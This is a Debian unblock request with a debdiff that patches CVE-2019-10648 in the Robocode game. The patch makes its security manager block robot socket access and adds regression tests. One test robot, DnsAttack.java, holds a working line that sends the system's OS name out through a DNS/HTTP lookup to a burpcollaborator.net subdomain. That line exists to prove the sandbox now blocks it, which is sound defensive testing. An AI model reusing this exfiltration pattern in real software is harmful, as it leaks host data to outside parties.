--- Begin Message ---
Package: release.debian.org
Severity: normal
User: release.debian.org@packages.debian.org
Usertags: unblock
Please unblock package robocode
Robocode in Buster is affected by CVE-2019-10648. The fix applied
cleanly and all tests pass. This is Debian bug 926088.
Thank you.
unblock robocode/1.9.3.3-2
-- System Information:
Debian Release: buster/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect
diff -Nru robocode-1.9.3.3/debian/changelog robocode-1.9.3.3/debian/changelog
--- robocode-1.9.3.3/debian/changelog 2018-09-13 13:52:33.000000000 +0200
+++ robocode-1.9.3.3/debian/changelog 2019-04-08 00:13:19.000000000 +0200
@@ -1,3 +1,13 @@
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+ * Fix CVE-2019-10648:
+ Robocode allows remote attackers to cause external service interaction
+ (DNS), as demonstrated by a query for a unique subdomain name within an
+ attacker-controlled DNS zone, because of a .openStream call within
+ java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <apo@debian.org> Mon, 08 Apr 2019 00:13:19 +0200
+
robocode (1.9.3.3-1) unstable; urgency=medium
* New upstream version 1.9.3.3.
diff -Nru robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch
--- robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 1970-01-01 01:00:00.000000000 +0100
+++ robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 2019-04-08 00:13:19.000000000 +0200
@@ -0,0 +1,235 @@
+From: Markus Koschany <apo@debian.org>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
++++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+
++import java.net.SocketPermission;
+ import java.security.AccessControlException;
++import java.security.Permission;
+
+
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ }
+
+ Thread c = Thread.currentThread();
+-
+ if (isSafeThread(c)) {
+ return;
+ }
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager {
+ if (robotProxy != null) {
+ robotProxy.punishSecurityViolation(message);
+ }
+- throw new AccessControlException(message);
++ throw new SecurityException(message);
+ }
+ }
+
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ return;
+ }
+ Thread c = Thread.currentThread();
+-
+ if (isSafeThread(c)) {
+ return;
+ }
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager {
+ String message = "Robots are only allowed to create up to 5 threads!";
+
+ robotProxy.punishSecurityViolation(message);
+- throw new AccessControlException(message);
++ throw new SecurityException(message);
+ }
+ }
++
++ public void checkPermission(Permission perm) {
++ if (RobocodeProperties.isSecurityOff()) {
++ return;
++ }
++ Thread c = Thread.currentThread();
++ if (isSafeThread(c)) {
++ return;
++ }
++ super.checkPermission(perm);
++
++ if (perm instanceof SocketPermission) {
++ IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
++ String message = "Using socket is not allowed";
++ robotProxy.punishSecurityViolation(message);
++ throw new SecurityException(message);
++ }
++ }
+
+ private boolean isSafeThread(Thread c) {
+ return threadManager.isSafeThread(c);
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
++package tested.robots;
++
++public class DnsAttack extends robocode.Robot {
++ static {
++ try {
++ new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".")
++ + ".randomsubdomain.burpcollaborator.net").openStream();
++ } catch (Exception e) {
++ }
++ }
++
++ public void run() {
++ for (;;) {
++ ahead(100);
++ back(100);
++ }
++ }
++}
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+
+ private boolean messagedInitialization;
+- private boolean messagedAccessDenied;
++ private boolean securityExceptionOccurred;
+
+ @Override
+ public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ messagedInitialization = true;
+ }
+
+- if (out.contains("access denied (java.net.SocketPermission")
+- || out.contains("access denied (\"java.net.SocketPermission\"")) {
+- messagedAccessDenied = true;
++ if (out.contains("java.lang.SecurityException:")) {
++ securityExceptionOccurred = true;
+ }
+ }
+
+ @Override
+ protected void runTeardown() {
+ Assert.assertTrue("Error during initialization", messagedInitialization);
+- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ }
+
+ @Override
+ protected int getExpectedErrors() {
+- return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error
++ return 2;
+ }
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+ */
+ public class TestHttpAttack extends RobocodeTestBed {
+
+- private boolean messagedAccessDenied;
++ private boolean securityExceptionOccurred;
+
+ @Override
+ public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+
+ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+
+- if (out.contains("access denied (java.net.SocketPermission")
+- || out.contains("access denied (\"java.net.SocketPermission\"")) {
+- messagedAccessDenied = true;
++ if (out.contains("java.lang.SecurityException:")) {
++ securityExceptionOccurred = true;
+ }
+ }
+
+ @Override
+ protected void runTeardown() {
+- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ }
+
+ @Override
+ protected int getExpectedErrors() {
+- return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors.
++ return 1;
+ }
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
++/**
++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
++ * All rights reserved. This program and the accompanying materials
++ * are made available under the terms of the Eclipse Public License v1.0
++ * which accompanies this distribution, and is available at
++ * https://robocode.sourceforge.io/license/epl-v10.html
++ */
++package net.sf.robocode.test.robots;
++
++import net.sf.robocode.test.helpers.RobocodeTestBed;
++import org.junit.Assert;
++import robocode.control.events.TurnEndedEvent;
++
++/**
++ * @author Flemming N. Larsen (original)
++ */
++public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
++
++ private boolean securityExceptionOccurred;
++
++ @Override
++ public String getRobotNames() {
++ return "tested.robots.DnsAttack,sample.Target";
++ }
++
++ @Override
++ public void onTurnEnded(TurnEndedEvent event) {
++ super.onTurnEnded(event);
++
++ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
++
++ if (out.contains("SYSTEM: Using socket is not allowed")) {
++ securityExceptionOccurred = true;
++ }
++ }
++
++ @Override
++ protected void runTeardown() {
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
++ }
++
++ @Override
++ protected int getExpectedErrors() {
++ return 1;
++ }
++}
diff -Nru robocode-1.9.3.3/debian/patches/series robocode-1.9.3.3/debian/patches/series
--- robocode-1.9.3.3/debian/patches/series 2018-09-13 13:52:33.000000000 +0200
+++ robocode-1.9.3.3/debian/patches/series 2019-04-08 00:13:19.000000000 +0200
@@ -1,3 +1,4 @@
showJavaDocumentation.patch
maven-assembly.patch
ecj.patch
+CVE-2019-10648.patch
--- End Message ---